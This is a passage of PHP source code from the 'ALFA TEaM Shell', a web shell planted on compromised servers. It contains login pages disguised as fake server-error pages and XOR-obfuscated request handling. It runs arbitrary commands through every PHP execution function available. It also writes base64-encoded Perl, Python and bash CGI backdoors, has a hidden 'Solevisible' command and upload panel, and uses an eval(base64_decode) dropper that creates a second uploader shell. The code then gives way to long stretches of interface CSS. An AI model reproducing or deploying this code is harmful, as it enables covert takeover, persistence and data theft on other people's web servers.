<div id=loginbox><p><font face="verdana,arial" size=-1>
<center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
<tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</b></font></th></tr>
<tr><td bgcolor="black" style="padding:5">
<form method="post">
<input type="hidden" name="action" value="login">
<input type="hidden" name="hide" value="">
<center><table>
<tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
<tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
<tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Login"></font></td></tr></table>
</div><br /></center>';
exit;
}
}elseif($config['AlfaLoginPage']=='500'){
if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
header('location: '.$_SERVER["PHP_SELF"]);
}
echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>'.$SERVER_SIG.'</body></html>'.$Eform;
exit;
}
}elseif($config['AlfaLoginPage']=='403'){
if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
header('location: '.$_SERVER["PHP_SELF"]);
}
echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
exit;
}
}elseif($config['AlfaLoginPage']=='404'){
if(@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
header('location: '.$_SERVER["PHP_SELF"]);
}
echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>".$SERVER_SIG."</body></html>".$Eform;
exit;
}
}
}
function decrypt_post($str, $pwd){
	if(__ALFA_POST_ENCRYPTION__){
		$pwd     = __ZW5jb2Rlcg($pwd);
		$str     = __ZGVjb2Rlcg($str);
		$enc_chr = "";
		$enc_str = "";
		$i       = 0;
		while ($i < strlen($str)) {
			for ($j = 0; $j < strlen($pwd); $j++) {
				$enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
				$enc_str .= $enc_chr;
				$i++;
				if ($i >= strlen($str))
					break;
			}
		}
		return __ZGVjb2Rlcg($enc_str);
	}else{
		return __ZGVjb2Rlcg($str);
	}
}

function _AlfaSecretKey(){
	if(!isset($_SESSION["AlfaSecretKey"])){
		$_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
	}
	return $_SESSION["AlfaSecretKey"];
}
function alfa_getColor($target){
	if(isset($GLOBALS["DB_NAME"]["color"][$target])&&$GLOBALS["DB_NAME"]["color"][$target]!=""){
		return $GLOBALS["DB_NAME"]["color"][$target];
	}else{
		$target = $GLOBALS["__ALFA_COLOR__"][$target];
		if(is_array($target)){
			return $target["key_color"];
		}else{
			return $target;
		}
	}
}
function alfaCssLoadColors(){
	$css = "";
	foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
		if(!is_array($value)){
			$value = alfa_getColor($key);
			$css .= ".{$key}{color: {$value};}";
		}else{
			if(isset($value["multi_selector"])){
				foreach($value["multi_selector"] as $k => $v){
					$color = alfa_getColor($key);
					$code = str_replace("{color}", $color, $v);
					$css .=  $k."{".$code."}";
				}
			}
		}
	}
	return $css;
}
if(isset($_POST['ajax'])){
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo '<script>';
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo 'alfa'.$alfa."_=";
}
echo '""</script>';
}}
function _alfa_cgicmd($cmd,$lang="perl"){
	if(isset($_SESSION["alfacgiapi_mode"])){
		return "";
	}
	$cmd_pure = $cmd;
	$is_curl = function_exists('curl_version');
	$is_socket = function_exists('fsockopen');
	if($is_curl||$is_socket){
		$recreate = false;
		if(isset($_SESSION["alfacgiapi"])){
			if(!@file_exists("alfacgiapi/".$_SESSION["alfacgiapi"].".alfa")){
				$recreate = true;
				$lang = $_SESSION["alfacgiapi"];
			}
		}
		if(!isset($_SESSION["alfacgiapi"])||$recreate){
			@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
			$perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
			$py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
			$bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
			if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
			alfaWriteTocgiapi($lang.".alfa",$source);
			alfacgihtaccess('cgi', "alfacgiapi/");
		}else{
			$lang = $_SESSION["alfacgiapi"];
		}
		$cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
		if($is_curl){
			$address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
			$post = new AlfaCURL();
			$data = $post->Send($address, "post", $cmd);
		}elseif($is_socket){
			$server = $_SERVER["SERVER_NAME"];
			$uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
			$data = _alfa_fsockopen($server,$uri,$cmd);
		}
		$out = "";
		if(strstr($data, "[solevisible~api]")){
			$_SESSION["alfacgiapi"] = $lang;
			if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
				$out = $res[1];
			}
		}elseif($lang=="perl"){
			return _alfa_cgicmd($cmd_pure,"py");
		}elseif($lang=="py"){
			return _alfa_cgicmd($cmd_pure,"bash");
		}else{
			$_SESSION["alfacgiapi_mode"] = "off";
		}
		return trim($out);
	}else{
		return "";
	}
}
function alfaEx($in,$re=false,$cgi=true,$all=false){
	$data = _alfa_php_cmd($in,$re);
	if(empty($data)&&$cgi||$all){
		if($GLOBALS['sys']=='unix'){
			if(strlen(_alfa_php_cmd("whoami"))==0||$all){
				$cmd = _alfa_cgicmd($in);
				if(!empty($cmd)){
					return $cmd;
				}
			}
		}
	}
	return $data;
}
function _alfa_php_cmd($in,$re=false){
$out='';
try{
if($re)$in=$in." 2>&1";
if(function_exists('exec')){
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')){
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(function_exists("popen")&&function_exists("pclose")){
if(is_resource($f = @popen($in,"r"))){
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
}elseif(function_exists('proc_open')){
$pipes = array();
$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
$out=@stream_get_contents($pipes[1]);
}elseif(class_exists('COM')){
$alfaWs = new COM('WScript.shell');
$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
$stdout = $exec->StdOut();
$out=$stdout->ReadAll();
}
}catch(Exception $e){}
return $out;
}
function _alfa_fsockopen($server,$uri,$post){
	$socket = @fsockopen($server, 80, $errno, $errstr, 15);
	if($socket){
		$http  = "POST {$uri} HTTP/1.0\r\n";
		$http .= "Host: {$server}\r\n";
		$http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
		$http .= "Content-Type: application/x-www-form-urlencoded\r\n";
		$http .= "Content-length: " . strlen($post) . "\r\n";
		$http .= "Connection: close\r\n\r\n";
		$http .= $post . "\r\n\r\n";
		fwrite($socket, $http);
		$contents = "";
		while (!@feof($socket)) {
			$contents .= @fgets($socket, 4096);
		}
		list($header, $body) = explode("\r\n\r\n", $contents, 2);
		@fclose($socket);
		return $body;
	}else{
		return "";
	}
}
if(isset($_GET["solevisible"])){
@error_reporting(E_ALL ^ E_NOTICE);
echo '<html>';
echo "<title>Solevisible Hidden Shell</title>";
echo "<body bgcolor=#000000>";
echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
$safe_mode = @ini_get('safe_mode');
if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
echo "PHP Version: <font color=white>" . PHP_VERSION .  "</font><br />";
echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
echo"<font color=#7CFC00>Disable functions : </font>";
$disfun = @ini_get('disable_functions');
if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
echo"<font color=red>";
echo "$disfun";
echo"</font><br>";
echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
if(isset($_FILES['file'])){
if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
}
echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
<hr><pre>';
if(isset($_POST['command_solevisible'])){
if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
$solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
echo alfaEx($solevisible);
}
echo'</pre>
</body></html>';
exit;}
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
if(function_exists('set_magic_quotes_runtime')){
@set_magic_quotes_runtime(0);
}
foreach($_POST as $key => $value){
if(is_array($_POST[$key])){
$i=0;
foreach($_POST[$key] as $f) {
$f = trim(str_replace(' ', '+',$f));
$_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
$i++;
}
}else{
$value = trim(str_replace(' ', '+',$value));
$_POST[$key] = decrypt_post($value, _AlfaSecretKey());
}
}
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(strtolower(substr(PHP_OS,0,3))=="win")
$GLOBALS['sys']='win';
else
$GLOBALS['sys']='unix';
$GLOBALS['home_cwd'] = @getcwd();
if($_POST["a"] != "GetPathHistory"){
	if($_SESSION[__LAST_CWD__]!=$_POST['c']){
		$_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
	}
}
$GLOBALS["need_to_update_header"] = "false";
if(isset($_POST['c'])){
if(!@chdir($_POST['c'])){
	$GLOBALS['glob_chdir_false'] = true;
}
}
$GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());
if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}
if($GLOBALS['sys'] == 'win'){
$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
$_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
}
if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}
function alfahead(){
if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
if(!isset($_POST['ajax'])){
function Alfa_GetDisable_Function(){
$disfun = @ini_get('disable_functions');
$afa = '<span class="header_show_all">All Functions Accessible</span>';
if(empty($disfun))return($afa);
$s = explode(',',$disfun);
$s = array_unique($s);
$i=0;
$b=0;
$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
$black_list = array();
$allow_list = array();
foreach($s as $d){
	$d=trim($d);
	if(empty($d)||!is_callable($d))continue;
	if(!function_exists($d)){
		if(in_array($d,$func)){
			$dis .= $d." | ";$b++;
			$black_list[] = $d;
		}else{
			$allow_list[] = $d;
		}
		$i++;
	}
}
if($i==0)return($afa);
if($i <= count($func)){
$all = array_values(array_merge($black_list, $allow_list));
return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
}
return('<span class="disable_functions">'.$dis.'</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
}
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo '<script>';
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo 'alfa'.$alfa."_=";
}
echo '""</script>';
}
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['default_charset'];
$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
$totalSpace = $totalSpace?$totalSpace:1;
$on="<span class='header_on'> ON </span>";
$of="<span class='header_off'> OFF </span>";
$none="<span class='header_none'> NONE </span>";
if(function_exists('ssh2_connect'))
$ssh2=$on;
else
$ssh2=$of;
if(function_exists('curl_version'))
$curl=$on;
else
$curl=$of;
if(function_exists('mysql_get_client_info'))
$mysql=$on;
else
$mysql=$of;
if(function_exists('mssql_connect'))
$mssql=$on;
else
$mssql=$of;
if(function_exists('pg_connect'))
$pg=$on;
else
$pg=$of;
if(function_exists('oci_connect'))
$or=$on;
else
$or=$of;
if(@ini_get('disable_functions'))
$disfun=@ini_get('disable_functions');
else
$disfun="All Functions Enable";
if(@ini_get('safe_mode'))
$safe_modes="<span class='header_off'>ON</span>";
else
$safe_modes="<span class='header_on'>OFF</span>";
$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
if(@ini_get('open_basedir')){
$basedir_data = @ini_get('open_basedir');
if(strlen($basedir_data)>120){
$open_b=substr($basedir_data,0, 120)."...";
}else{
$open_b = $basedir_data;
}
}else{$open_b=$none;}
if(@ini_get('safe_mode_exec_dir'))
$safe_exe=@ini_get('safe_mode_exec_dir');
else
$safe_exe=$none;
if(@ini_get('safe_mode_include_dir'))
$safe_include=@ini_get('safe_mode_include_dir');
else
$safe_include=$none;
if(!function_exists('posix_getegid'))
{
$user = function_exists("get_current_user")?@get_current_user():"????";
$uid = function_exists("getmyuid")?@getmyuid():"????";
$gid = function_exists("getmygid")?@getmygid():"????";
$group = "?";
}else{
$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
for($j=0; $j<=$i; $j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}
$drives = "";
foreach(range('a','z') as $drive)
if(@is_dir($drive.':\\'))
$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
$csscode ='	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::..</title>
<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
<style type="text/css">
.hlabale {
    color: #67ABDF;
    border-radius: 4px;
    border: 1px solid #27979B;
    margin-left: 7px;
    padding: 2px;
}
#tbl_sympphp tr {
	text-align: center;
}
.editor-view {
	position: relative;
}
.view-content {
	position: absolute;
	overflow-y: auto;
	width: 100%;
	height: 475px;
}
*::-webkit-scrollbar-track {
	-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
	border-radius: 10px;
	background-color: #000115;
}
*::-webkit-scrollbar{
	width: 10px;
	background-color: #000115;
}
*::-webkit-scrollbar-thumb {
	border-radius: 10px;
	-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
	background-color: rgb(30, 130, 181);
}
.editor-file-name {
	margin-left: 29px;
	margin-top: 4px;
	overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
}
.editor-icon {
	position: absolute;
}
.is_active {
	background: rgba(49, 55, 93, 0.77);
	border-radius: 10px;
}
.history-list {
	height: 88%;
	overflow-y: auto;
}
#editor-minimized,#cgiloader-minimized {
	display: block;
	position: fixed;
	right: -30px;
	width: 30px;
	height: 30px;
	top: 30%;
}
.minimized-wrapper {
	position: relative;
	background: rgb(14, 48, 74);
    width: 44px;
    height: 167px;
	cursor: pointer;
	border-bottom-left-radius: 5px;
	border-top-left-radius: 5px;
}
.minimized-text {
    transform: rotate(-90deg);
    color: wheat;
    font-size: x-large;
    display: inline-block;
    position: absolute;
    right: -51px;
    width: 129px;
    top: 50px;
    border-top-left-radius: 4%;
    height: 56px;
    padding: 3px
}
.close-button,.editor-minimize {
	height: 26px;
    width: 38px;
    right: 7px;
    background: rgb(29, 86, 115);
    cursor: pointer;
    position: absolute;
    box-sizing: border-box;
    line-height: 50px;
    display: inline-block;
    top: 17px;
    border-radius: 100px;
}
.editor-minimize {right: 50px;}
.close-button:before,.close-button:after,.editor-minimize:before {
	transform: rotate(-45deg);
    content: "";
    position: absolute;
    top: 63%;
    right: 6px;
    margin-top: -5px;
    margin-left: -25px;
    display: block;
    height: 4px;
    width: 27px;
    background-color: rgba(216, 207, 207, 0.75);
    transition: all 0.25s ease-out;
}
.editor-minimize:before{
	transform: rotate(0deg);
}
.close-button:after {
  transform: rotate(-135deg);
}
.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
	background-color: red;
}
.close-button:hover,.editor-minimize:hover{
	background-color: rgba(39, 66, 80, 0.96);
}
#editor,#cgiloader {
	display: none;
	position: fixed;
    top: 0;
	width: 100%;
	height: 100%;
}
.editor-wrapper {
	width: 100%;
    height: 100%;
    position: relative;
    top: 1%;
}
.editor-header {
	width: 97%;
    background: rgba(21, 66, 88, 0.93);
    height: 37px;
    margin-left: 13px;
    position: relative;
	border-top-left-radius: 15px;
	border-top-right-radius: 15px;
}
.editor-path {
	position: absolute;
    font-size: x-large;
    margin-left: 10px;
    top: 6px;
    color: springgreen;
}
.editor-modal {
    position: relative;
    top: 0;
    background-color: rgba(0, 1, 23, 0.95);
    height: 90%;
    margin-left: 20%;
    margin-right: 2%;
    border: 2px #0e304a solid;
}
.editor-explorer {
    width: 19%;
    height: 90%;
    background-color: rgba(0, 1, 23, 0.94);
    position: absolute;
    z-index: 2;
    left: 1%;
    border: 2px rgb(14, 48, 74) solid;
}
.editor-controller {
	position: relative;
	top: -13px;
}
.file-holder {
	position: relative;
    width: 100%;
    height: 30px;
}
.file-holder > .history {
	position: absolute;
    color: rgb(3, 179, 163);
    cursor: pointer;
	left:5px;
    font-size: 18px;
    font-family: sans-serif;
	width:89%;
	height:100%;
	z-index: 3;
	border-radius: 10px;
	transition: background-color 600ms ease-out;
}
.file-holder > .history-close {
	display: block;
    opacity: 0;
    position: absolute;
    right: 2px;
    width: 20px;
    top: 4px;
    text-align: center;
    cursor: pointer;
    color: white;
    background: red;
    border-radius: 100px;
